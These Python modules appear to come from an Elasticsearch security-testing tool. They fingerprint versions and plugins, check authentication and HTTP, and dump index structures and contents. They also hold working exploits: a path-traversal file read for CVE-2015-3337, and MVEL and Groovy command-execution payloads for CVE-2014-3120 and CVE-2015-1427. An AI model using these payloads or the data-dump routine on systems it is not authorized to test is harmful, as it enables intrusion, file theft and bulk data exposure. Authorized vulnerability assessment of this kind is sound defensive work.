"""
Elasticsearch software test

This module probes an Elasticsearch instance to see what kind of software it's running.
Specifically, it enumerates the Elasticsearch version, built-in modules and their version and plugins and their version

Contains:
- SwTest class for performing software enumeration
- run() function as an entry point for running the test
"""

import http
from http import HTTPStatus

from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint

__TESTLABEL__ = "Elasticsearch software test"


class SwTest:
    """
    This class probes the Elasticsearch host and finds out what kind of software it has running
    """
    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response

        self.helpers.print_header(__TESTLABEL__)


    def _get_properties(self, response: dict) -> object:
        es_properties = {}

        try:
            es_properties["esVersion"] = response["version"]["number"]
        except KeyError as e:
            ptprint(f"Error when reading JSON response. Cannot find key: {e}", "ERROR", not self.args.json, indent=4)
            es_properties["esVersion"] = None

        try:
            es_properties["name"] = response["name"]
        except KeyError as e:
            ptprint(f"Error when reading JSON response. Cannot find key: {e}", "ERROR", not self.args.json, indent=4)
            es_properties["name"] = None

        try:
            es_properties["clusterName"] = response["cluster_name"]
        except KeyError as e:
            ptprint(f"Error when reading JSON response. Cannot find key: {e}", "ERROR", not self.args.json, indent=4)
            es_properties["clusterName"] = None

        try:
            es_properties["apacheLuceneVersion"] = response["version"]["lucene_version"]
        except KeyError as e:
            ptprint(f"Error when reading JSON response. Cannot find key: {e}", "ERROR", not self.args.json, indent=4)
            es_properties["apacheLuceneVersion"] = None

        return es_properties

    def _get_es_version(self) -> bool:
        """
        This method finds the Elasticsearch version by sending a GET request to http://<host>/ and looking at
        the returned JSON

        If successful, it adds the Elasticsearch version into the JSON output

        :return: False if we get an HTTP response other than 200 OK, or we don't find the version in the response.
                 True If we get an HTTP 200 OK response and we find the version
        """
        response = self.base_response

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Could not enumerate ES version. Received response code: {response.status_code}",
                    "OK", not self.args.json, indent=4)
            return False

        response = response.json()
        es_properties = self._get_properties(response)

        ptprint(f"Elasticsearch version: {es_properties['esVersion']}", "VULN", not self.args.json, indent=4)
        ptprint(f"Cluster name: {es_properties['clusterName']}", "VULN", not self.args.json, indent=4)
        ptprint(f"Apache Lucene Version: {es_properties['apacheLuceneVersion']}","VULN", not self.args.json, indent=4)
        node = self.ptjsonlib.create_node_object("swES", properties=es_properties)
        self.ptjsonlib.add_node(node)

        return True


    def _get_modules(self) -> bool:
        """
        This method enumerates the modules running on each Elasticsearch node by sending a GET request to
        http://<host>/_nodes and going through the JSON response

        If successful, it adds the module name, version and description into the JSON output

        :return: False if we get an HTTP response other than 200 OK. True if we get an HTTP 200 OK and we find modules
        """
        url = self.args.url + "_nodes"
        response = self.http_client.send_request(url, method="GET", headers=self.args.headers, allow_redirects=False)

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Could not enumerate modules. Received response code: {response.status_code}", "OK",
                    not self.args.json, indent=4)
            return False

        response = response.json()
        nodes = response["nodes"].keys()

        for node in nodes:
            modules = response["nodes"][node]["modules"]
            for module in modules:
                module_properties = {
                    "name": module["name"],
                    "version": module["version"],
                    "description": module["description"]
                }
                json_node = self.ptjsonlib.create_node_object("swModule", properties=module_properties)
                self.ptjsonlib.add_node(json_node)
                ptprint(f"Found module: {module_properties['name']} {module_properties['version']}",
                        "VULN", not self.args.json, indent=4)

        return True


    def _get_plugins(self) -> bool:
        """
        This method enumerates the plugins installed on each Elasticsearch node by sending a GET request to
        http://<host>/_cat/plugins/ and going through the JSON response

        If successful, it adds the plugin node, name and version into the JSON output

        :return: False if we get an HTTP response other than 200 OK. True if we get an HTTP 200 OK
        """
        url = self.args.url + "_cat/plugins"

        response = self.http_client.send_request(url, method="GET", headers=self.args.headers, allow_redirects=False)

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Could not enumerate plugins. Received response code: {response.status_code}", "OK",
                    not self.args.json, indent=4)
            return False

        plugins = [line.split(" ") for line in response.text.split("\n")]
        del plugins[-1]    # remove empty string from plugin list

        for plugin in plugins:
            plugin = list(filter(None, plugin)) # remove empty string from plugin
            plugin_properties = {
                "esNode": plugin[0],
                "name": plugin[1],
                "version": plugin[2]
            }
            json_node = self.ptjsonlib.create_node_object("swPlugin", properties=plugin_properties)
            self.ptjsonlib.add_node(json_node)
            ptprint(f"Found plugin: {plugin_properties['name']} {plugin_properties['version']} "
                    f"on node: {plugin_properties['esNode']}", "VULN", not self.args.json, indent=4)

        return True


    def run(self) -> None:
        """
        This method executes the software enumeration.

        Runs ES version enumeration, module enumeration and plugin enumeration. If any of these 3 are successful (they
        return True) it adds the PTV-WEV-MISC-TECH vulnerability to the JSON output
        """

        es_version, modules, plugins = False, False, False

        try:
            es_version = self._get_es_version()
        except Exception as e:
            ptprint(f"Error when enumerating es version: {e}", "ERROR",
                    not self.args.json, indent=4)

        try:
            modules = self._get_modules()
        except Exception as e:
            ptprint(f"Error when enumerating modules: {e}", "ERROR",
                    not self.args.json, indent=4)

        try:
            plugins = self._get_plugins()
        except Exception as e:
            ptprint(f"Error when enumerating plugins: {e}", "ERROR",
                    not self.args.json, indent=4)

        if plugins or modules or es_version:
            self.ptjsonlib.add_vulnerability("PTV-WEB-MISC-TECH")


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the software test"""
    SwTest(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch CVE-2015-3337 test

This module implements a test to see if the host is vulnerable to CVE-2015-3337

https://nvd.nist.gov/vuln/detail/CVE-2015-3337

Contains:
- Vuln class for performing the test
- run() function as an entry point for running the test
"""

import http
from http import HTTPStatus

import requests
from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint
from packaging.version import Version
from pathlib import Path

__TESTLABEL__ = "Elasticsearch CVE-2015-3337 test"


class Vuln:
    """
    This class check to see if the host is vulnerable to CVE-2015-3337 by first checking if the Elasticsearch version is vulnerable
    and then trying to exploit the vulnerability by reading the file specified by the -F switch on the host
    """
    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response
        self.helpers.print_header(__TESTLABEL__)
        self.cve_id = Path(__file__).stem.upper()


    def _check_version(self) -> None:
        """
        This method compares the version of Elasticsearch running on the host to check if it is < 1.4.5 or 1.5.x < 1.5.2 and thus vulnerable to CVE-2015-3337
        """
        version = Version(self.base_response.json()["version"]["number"])

        if version < Version("1.4.5") or Version("1.5.0") <= version < Version("1.5.2"):
            ptprint(f"Elasticsearch {version} should be vulnerable to {self.cve_id}", "INFO", not self.args.json, indent=4)
            return

        ptprint(f"Elasticsearch {version} might not be vulnerable to {self.cve_id}", "INFO", not self.args.json, indent=4)


    def _get_plugins(self) -> list:
        """
        This method list retrieves all plugins from the /_cat/plugins endpoint and returns a list of all plugin endpoints
        """
        plugins = self.http_client.send_request(method="GET", url=self.args.url+"_cat/plugins")

        if plugins.status_code != HTTPStatus.OK:
            ptprint(f"Could not get plugins. Received response: {plugins.status_code} {plugins.text}", "ERROR",
                    not self.args.json, indent=4)
            return []

        try:
            plugins = [plugin[plugin.find("/"):][1:-1] for plugin in plugins.text.split("\n")]
            plugins = list(filter(None, plugins))   # Remove empty string from plugin list
        except Exception as e:
            ptprint(f"Could not get plugins. {e}", "ERROR", not self.args.json, indent=4)
            return []

        ptprint(f"Found plugins: {''.join(plugins)}", "INFO", self.args.verbose, indent=4)

        return plugins


    def _exploit(self) -> bool:
        """
        This method exploits CVE-2015-3337 by first retrieving all available plugins with the _get_plugins() method and then attempting
        directory traversal on each of the available plugin endpoints. If we get an HTTP 200 OK response. The method prints out the
        received contents and adds them to the JSON output.

        The exploit follows the vulhub PoC available at: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337

        :return: True if any of the plugins responds with an HTTP 200 OK. False otherwise
        """
        exploited = False
        plugins = self._get_plugins()

        if not plugins:
            ptprint(f"No plugins available for exploitation.", "ERROR", not self.args.json, indent=4)
            return False

        file = self.args.file

        for plugin in plugins:
            url = self.args.url + f"{plugin}../../../../../../../../../../../../..{file}"
            response = self.http_client.send_raw_request(url=url, method="GET") # Raw request to avoid path normalization

            ptprint(f"Attempting to exploit plugin {plugin}. Response: {response.text}", "INFO", self.args.verbose, indent=4)

            if response.status == HTTPStatus.OK:
                exploited = True
                break

            ptprint(f"Could not exploit any plugin", "ERROR", not self.args.json, indent=4)
            return exploited


        file_content = response.text

        ptprint(f"Contents of {file}: {file_content}", "INFO", not self.args.json, indent=4)
        content_node = self.ptjsonlib.create_node_object("file", properties={"name": file, "fileContent": file_content})
        self.ptjsonlib.add_node(content_node)

        return exploited


    def run(self) -> None:
        """
        Executes the Elasticsearch CVE-2015-3337 test by first checking if the version might be vulnerable and then exploiting
        the vulnerability with the _exploit() method. If the exploit is successful, CVE-2015-3337 is added to the JSON output
        """
        self._check_version()

        if self._exploit():
            ptprint(f"The host is vulnerable to {self.cve_id}", "VULN", not self.args.json, indent=4)
            es_node_key = self.helpers.check_node("swES")
            if es_node_key:
                self.ptjsonlib.add_vulnerability(f"PTV-{self.cve_id}", node_key=es_node_key)
            else:
                self.ptjsonlib.add_vulnerability(f"PTV-{self.cve_id}")

        else:
            ptprint(f"The host is not vulnerable to {self.cve_id}", "OK", not self.args.json, indent=4)


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the Vuln test"""
    Vuln(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch authentication test

This module implements a test that checks if an Elasticsearch instance has authentication enabled or disabled

Contains:
- Auth class for performing authentication test
- run() function as an entry point for running the test
"""

import http
from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint

__TESTLABEL__ = "Elasticsearch authentication test"


class Auth:
    """
    This class tests to see if an Elasticsearch instance is running with authentication enabled or disabled by
    sending a GET request to the provided URL and looking at the HTTP response code.
    """

    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response

        self.helpers.print_header(__TESTLABEL__)


    def _print_anon_role(self):
        """
        This method prints the role of the anonymous user
        """
        url = self.args.url + "_security/user"
        response = self.http_client.send_request(url , method="GET", headers=self.args.headers, allow_redirects=False)

        if response.status_code != http.HTTPStatus.OK:
            self.ptjsonlib.end_error(f"Webpage returns status code: {response.status_code}", self.args.json)

        users = response.json()

        for user in users.keys():
            if "anon" in user or "anonymous" in user:
                ptprint(f"Authentication is enabled, but anonymous access is allowed", "VULN", not self.args.json,
                        indent=4)
                ptprint(f"Anonymous role: {', '.join(users[user]['roles'])}", "VULN", not self.args.json, indent=7)
                return

        ptprint(f"Authentication is enabled. Anonymous access is not available", "OK", not self.args.json, indent=4)
        ptprint(f"Could not find username which would match 'anonymous' or 'anon'. All users: {','.join(users.keys())}",
                "OK", not self.args.json, indent=4)

    def _test_anon_auth(self) -> None:
        """
        This method checks to see if authentication is truly disabled or anonymous access is allowed
        """
        url = self.args.url + "_xpack?filter_path=features.security"
        security = self.http_client.send_request(url , method="GET", headers=self.args.headers, allow_redirects=False)

        if security.status_code != http.HTTPStatus.OK:
            ptprint(f"Error when probing authentication at {url}. Received response: {security.status_code}", "ERROR", not self.args.json, indent=4)
            return

        security = security.json()

        if not security["features"]["security"]["enabled"]:
            ptprint(f"Authentication is disabled", "VULN", not self.args.json, indent=4)
            self.ptjsonlib.add_vulnerability("PTV-WEB-ELASTIC-AUTH")
            self.ptjsonlib.add_properties({"authentication": "disabled"})
            return

        self._print_anon_role()

    def run(self) -> None:
        """
        Executes the Elasticsearch authentication test

        Sends one HTTP GET request to the provided URL and determines if authentication is enabled or not by the
        HTTP response codes as follows:

        401 Unauthorized = Authentication is enabled
        200 OK - Authentication is disabled

        If authentication is disabled, a vulnerability and a property are added to the JSON result
        """
        response = self.base_response

        if response.status_code == http.HTTPStatus.UNAUTHORIZED:
            ptprint(f"Authentication is enabled", "OK", not self.args.json, indent=4)

        elif response.status_code == http.HTTPStatus.OK:
            self._test_anon_auth()

        else:
            self.ptjsonlib.end_error(f"Webpage returns status code: {response.status_code}", self.args.json)


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the Auth test"""
    Auth(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch HTTP/S test

This module tests if an Elasticsearch instance is running on HTTPS or HTTP
"""

import http
from http import HTTPStatus
from http.client import responses

from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint

__TESTLABEL__ = "Elasticsearch HTTP/S test"


class HttpTest:
    """
    This class tests to see if the host has Elasticsearch running on HTTP or HTTPS
    """

    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response

        self.helpers.print_header(__TESTLABEL__)


    def _check_http(self, url) -> None:
        """
        This method checks to see if the provided URL is really running on HTTP by sending a GET request and looking
        at the response

        If the server responds with an HTTP 200 OK, we print a message and add a vulnerability to the JSON output

        If not, we print a message that the server is running HTTPS

        :param url: Host to test
        :return:
        """
        if url == self.args.url:
            response = self.base_response
        else:
            response = self.http_client.send_request(url, method="GET", headers=self.args.headers, allow_redirects=False)

        if response.status_code in [HTTPStatus.OK, HTTPStatus.UNAUTHORIZED]:
            ptprint(f"The host is running HTTP", "VULN", not self.args.json, indent=4)
            self.ptjsonlib.add_vulnerability("PTV-ELASTIC-MISC-HTTP")
        else:
            ptprint(f"The host is not running on HTTP", "OK", not self.args.json, indent=4)


    def _check_url(self) -> str:
        """
        This method edits the provided URL.

        Adds '\\http://' to the begging of the URL if no protocol is provided

        www.example.com:9200 -> \\http://www.example.com:9200

        Doesn't do anything if a protocol is provided

        :return: Edited URL
        """

        url = self.args.url

        if "http://" not in url and "https://" not in url:
            return "http://" + url

        return url


    def run(self) -> None:
        """
        Executes the Elasticsearch HTTP/S test

        Edits the URL if necessary and checks if the host is really running HTTP or not

        If we're provided with an HTTPS URL, we just print a message that says the host is running HTTPS
        """

        url = self._check_url()

        if "http://" in url:
            self._check_http(url)
            return

        ptprint(f"The host is not running on HTTP", "OK", not self.args.json, indent=4)


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the HTTP/S test"""
    HttpTest(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch data structure test

Contains:
- StrucDump to perform the data structure test
- run() function as an entry point for running the test
"""

import http
from http.client import responses
from mimetypes import inited

from requests import Response
from http import HTTPStatus
from xml.etree.ElementPath import prepare_parent

from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint

__TESTLABEL__ = "Elasticsearch data structure test"


class StrucDump:
    """
    This class gets all indexes from an ES instance and then dumps what fields each index contains
    """
    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response

        self.helpers.print_header(__TESTLABEL__)


    def _get_indices(self) -> list:
        """
        This method retrieves all available indexes at an ES instance

        :return: List of indexes if successful. Empty list otherwise
        """
        response = self.http_client.send_request(method="GET", url=self.args.url+"_cat/indices?pretty", headers=self.args.headers)

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Error fetching indices. Received response: {response.status_code} {response.text}", "ERROR",
                    not self.args.json, indent=4)
            return []

        try:
            indices = [line.split()[2] for line in response.text.strip().split("\n") if line.strip()]
        except Exception as e:
            ptprint(f"Error when reading indices: {e}", "ERROR", not self.args.json, indent=4)
            return []

        return indices


    def _get_fields(self, mapping, prefix="") -> list:
        """
        This method recursively collects all field paths from ES mapping.

        :return: List of fields in an index mapping
        """
        fields = []
        props = mapping["properties"]

        for field_name, field_info in props.items():
            full_name = f"{prefix}{field_name}" if not prefix else f"{prefix}.{field_name}"
            fields.append(full_name)

            if "properties" in field_info:
                fields.extend(self._get_fields(field_info, prefix=full_name))

        return fields


    def run(self) -> None:
        """
        Executes the Elasticsearch data structure test

        This method gets all indices with the _get_indices() method and then prints fields in an index by sending a request to
        the /<index name> endpoint and then retrieving all the fields with the method _get_fields()

        If the -vv/--verbose switch is provided, the method prints hidden indices (indices starting with .) along all other indices.
        """
        for index in self._get_indices():
            if not self.args.verbose and index.startswith("."):
                continue

            response = self.http_client.send_request(method="GET", url=self.args.url + index)

            if response.status_code != HTTPStatus.OK:
                ptprint(f"Error fetching index {index}. Received response: {response.status_code} {response.text}",
                        "ERROR",
                        not self.args.json, indent=4)
                continue

            response = response.json()

            try:
                fields = self._get_fields(mapping=response[index]["mappings"])
            except KeyError as e:
                ptprint(f"Index {index} has no mappings with {e} field", "ERROR", not self.args.json, indent=4)
                continue

            ptprint(f"Index {index}", "INFO", not self.args.json, indent=4)
            ptprint(', '.join(fields), "INFO", not self.args.json, indent=8)

def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the StrucDump test"""
    StrucDump(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch CVE-2014-3120 test

This module implements a test that checks if the hosts is vulnerable to CVE-2014-3120

https://nvd.nist.gov/vuln/detail/CVE-2014-3120

Contains:
- Vuln class to perform the test
- run() function as an entry point for running the test
"""

import http
import requests
from requests import Response
from http import HTTPStatus
from xml.etree.ElementPath import prepare_parent
from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint
from packaging.version import Version
from pathlib import Path

__TESTLABEL__ = "Elasticsearch CVE-2014-3120 test"


class Vuln:
    """
    This class checks to see if the host is vulnerable to CVE-2014-3120 by first checking if the version is lower than 1.2
    and then sending a malicious MVEL script to execute the command '/bin/sh -c echo exploited'
    """
    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response
        self.helpers.print_header(__TESTLABEL__)
        self.cve_id = Path(__file__).stem.upper()


    def _check_version(self) -> None:
        """
        This method compares the version of Elasticsearch running on the host to check if it lower than 1.2 and thus vulnerable to
        CVE-2014-3120
        """
        version = Version(self.base_response.json()["version"]["number"])

        if version < Version("1.2"):
            ptprint(f"Elasticsearch {version} should be vulnerable to {self.cve_id}", "INFO", not self.args.json,
                    indent=4)
            return

        ptprint(f"Elasticsearch {version} might not be vulnerable to {self.cve_id}", "INFO", not self.args.json, indent=4)


    def _exploit(self) -> bool:
        """
        This method tries to exploit CVE-2014-3120 by sending a malicious MVEL script that executes the '/bin/sh -c echo exploited'
        command and checking if the response contains the 'exploited' string

        :return: True if exploitation was successful. False otherwise
        """
        headers = {"Content-Type": "application/json"}
        new_document = '{"payload": "exploit"}'
        response = requests.post(url=self.args.url + "exploit/payload", data=new_document, headers=headers)

        if response.status_code != HTTPStatus.CREATED:
            ptprint(f"Error when creating new document. Received response code: {response.status_code}", "ERROR",
                    not self.args.json, indent=4)
            return False

        payload = '{"size": 1, "query": {"filtered": {"query": {"match_all": {} } } }, "script_fields": {"results": {"script": "new java.util.Scanner(Runtime.getRuntime().exec(new String[]{ \\"/bin/sh\\", \\"-c\\", \\"echo exploited;\\"}).getInputStream()).useDelimiter(\\"\\\\\\\\A\\").next();"} } }'
        headers = {"content-type": "application/json"}
        response = requests.request("GET", self.args.url+"_search?pretty", data=payload, headers=headers, timeout=3)

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Error when sending request to _search. Received response code: {response.status_code}", "ERROR", not self.args.json, indent=4)
            return False

        response = response.json()

        return response['hits']['hits'][0]['fields']['results'] == ['exploited\n']


    def run(self) -> None:
        """
        Executes the Elasticsearch CVE-2014-3120 test by first comparing the version and then exploiting the vulnerability
        """
        self._check_version()

        if self._exploit():
            ptprint(f"The host is vulnerable to {self.cve_id}", "VULN", not self.args.json, indent=4)
            es_node_key = self.helpers.check_node("swES")
            if es_node_key:
                self.ptjsonlib.add_vulnerability(f"PTV-{self.cve_id}", node_key=es_node_key)
            else:
                self.ptjsonlib.add_vulnerability(f"PTV-{self.cve_id}")

        else:
            ptprint(f"The host is not vulnerable to {self.cve_id}", "OK", not self.args.json, indent=4)


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the CVE-2014-3120 test"""
    Vuln(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch data dump module

Contains:
- DataDump to perform the data dump
- run() function as an entry point for running the test
"""

import http
from http.client import responses
from http.cookiejar import cut_port_re
from mimetypes import inited
import json
from typing import Literal

from requests import Response
from http import HTTPStatus
from xml.etree.ElementPath import prepare_parent

from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint

__TESTLABEL__ = "Elasticsearch data dump module"


class DataDump:
    """
    This class dumps all data from indices in an Elasticsearch instance
    """
    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response

        self.helpers.print_header(__TESTLABEL__)


    def _get_data(self, data: dict, field: str):
        """
        This method retrieves the value assigned to the provided field in the index data
        """
        if "." in field:
            field = field.split(".")
            value = data
            for key in field:
                value = value[key]
        else:
            value = data[field]

        return value


    def _get_field(self, entry: dict) -> dict:
        """
        This method goes through all the fields provided with the -df/--dump-fields argument and retrieves its key:value pair from the data
        entry and then adds it to a dictionary that is returned by this method.

        :return: Dictionary with the desired fields and its values. Empty dictionary if the field/s is not found in the data entry
        """
        results = {"_id": entry["_id"], "_index": entry["_index"]}
        data = entry["_source"]

        for field in self.args.dump_field:
            try:
                results.update({field: self._get_data(data, field)})
            except KeyError as e:
                ptprint(f"The entry {entry} does not contain field {e}", "ERROR", self.args.verbose, indent=4)

        return results if len(results.keys()) > 2 else {}


    def _write_to_file(self, data) -> None:
        with open(self.args.out_file, "w", encoding='utf-8') as f:
            json.dump(data, f, ensure_ascii=False, indent=4)


    def run(self) -> None:
        """
        Executes the Elasticsearch data dump

        This method sends an HTTP GET request to all the indices provided with the -di/--dump-index argument (all indices if none are provided)
        and dumps all data from it. If --df/--dump-fields are set, it extracts the desired fields from the data with the _get_field() method
        """

        for index in self.args.dump_index:
            response = self.http_client.send_request(method="GET",url=self.args.url + f"{index}/_search?size=10000")

            if response.status_code != HTTPStatus.OK:
                ptprint(f"Error when reading indices: Received response: {response.status_code} {response.text}",
                        "ERROR", not self.args.json, indent=4)
                continue

            data = response.json()["hits"]["hits"]  # limit 10 000 hits
            full_data = []

            if self.args.dump_field:

                for entry in data:
                    isolated_data = self._get_field(entry)
                    ptprint(isolated_data, "INFO", not self.args.json, indent=4) if isolated_data else None
                    full_data.append(isolated_data) if isolated_data else None

            else:
                ptprint(data, "INFO", not self.args.json, indent=4)
                full_data = data

            if self.args.out_file and full_data:
                self._write_to_file(full_data)


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the DataDump test"""
    DataDump(args, ptjsonlib, helpers, http_client, base_response).run()



"""
Elasticsearch CVE-2015-1427 test

This module implements a test to see if the host is vulnerable to CVE-2015-1427

https://nvd.nist.gov/vuln/detail/CVE-2015-1427

Contains:
- Vuln class for performing the test
- run() function as an entry point for running the test
"""

import http
from http import HTTPStatus
from ptlibs import ptjsonlib
from ptlibs.ptprinthelper import ptprint
from packaging.version import Version
from pathlib import Path


__TESTLABEL__ = "Elasticsearch CVE-2015-1427 test"


class Vuln:
    """
    This class check to see if the host is vulnerable to CVE-2015-1427 by first checking if the version is lower than 1.3.8 or 1.4.x
    lower than 1.4.3 and then sending a malicious script to execute the command 'echo exploited'
    """
    def __init__(self, args: object, ptjsonlib: object, helpers: object, http_client: object, base_response: object) -> None:
        self.args = args
        self.ptjsonlib = ptjsonlib
        self.helpers = helpers
        self.http_client = http_client
        self.base_response = base_response
        self.helpers.print_header(__TESTLABEL__)
        self.cve_id = Path(__file__).stem.upper()


    def _check_version(self) -> None:
        """
        This method compares the version of Elasticsearch running on the host to check if it is < 1.3.8 or 1.4.x < 1.4.3
        and thus vulnerable to CVE-2015-1427
        """
        version = Version(self.base_response.json()["version"]["number"])

        if version < Version("1.3.8") or (Version("1.4.0") <= version < Version("1.4.3")):
            ptprint(f"Elasticsearch {version} should be vulnerable to {self.cve_id}", "INFO", not self.args.json, indent=4)
            return

        ptprint(f"Elasticsearch {version} might not be vulnerable to {self.cve_id}", "INFO", not self.args.json, indent=4)


    def _exploit(self) -> bool:
        """
        This method exploits CVE-2015-1427 by first creating a new document at http://<host>:<port>/exploit/payload/
        and then sending a malicious script to the /_search?pretty endpoint. This script runs the 'echo exploited' command on the host
        and if we get a response that contains the output of this command - 'exploited\n' we have successfully exploited CVE-2015-1427

        :return: True if the exploitation was successful. False otherwise
        """
        headers = {"Content-Type": "application/json"}
        new_document = '{"payload": "exploit"}'

        ptprint(f"Creating new document {new_document} at exploit/payload", "INFO",
                    self.args.verbose, indent=4)

        response = self.http_client.send_request(method="POST", url=self.args.url+"exploit/payload", data=new_document, headers=headers)

        if response.status_code != HTTPStatus.CREATED:
            ptprint(f"Error when creating new document. Received response code: {response.status_code}", "ERROR",
                    not self.args.json, indent=4)
            return False

        payload = '{"size":1, "script_fields": {"exploit":{"lang":"groovy","script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"echo exploited\\").getText()"}}}'

        ptprint(f"Sending exploit {payload} to {self.args.url+'_search?pretty'}", "INFO",
                self.args.verbose, indent=4)

        response = self.http_client.send_request(url=self.args.url+"_search?pretty", headers=headers, data=payload)

        if response.status_code != HTTPStatus.OK:
            ptprint(f"Error when sending request to _search?pretty. Received response code: {response.status_code}. Response: {response.text}", "ERROR",
                    not self.args.json, indent=4)
            return False

        return response.json()["hits"]["hits"][0]["fields"]["exploit"] == ["exploited\n"]


    def run(self) -> None:
        """
        Executes the Elasticsearch CVE-2015-1427 test

        The method first checks if Elasticsearch is running a vulnerable version with the _check_version() method and then
        exploits the vulnerability with the _exploit() method
        """
        self._check_version()

        if self._exploit():
            ptprint(f"The host is vulnerable to {self.cve_id}", "VULN", not self.args.json, indent=4)
            es_node_key = self.helpers.check_node("swES")
            if es_node_key:
                self.ptjsonlib.add_vulnerability(f"PTV-{self.cve_id}", node_key=es_node_key)
            else:
                self.ptjsonlib.add_vulnerability(f"PTV-{self.cve_id}")

        else:
            ptprint(f"The host is not vulnerable to {self.cve_id}", "OK", not self.args.json, indent=4)


def run(args, ptjsonlib, helpers, http_client, base_response):
    """Entry point for running the Vuln test"""
    Vuln(args, ptjsonlib, helpers, http_client, base_response).run()
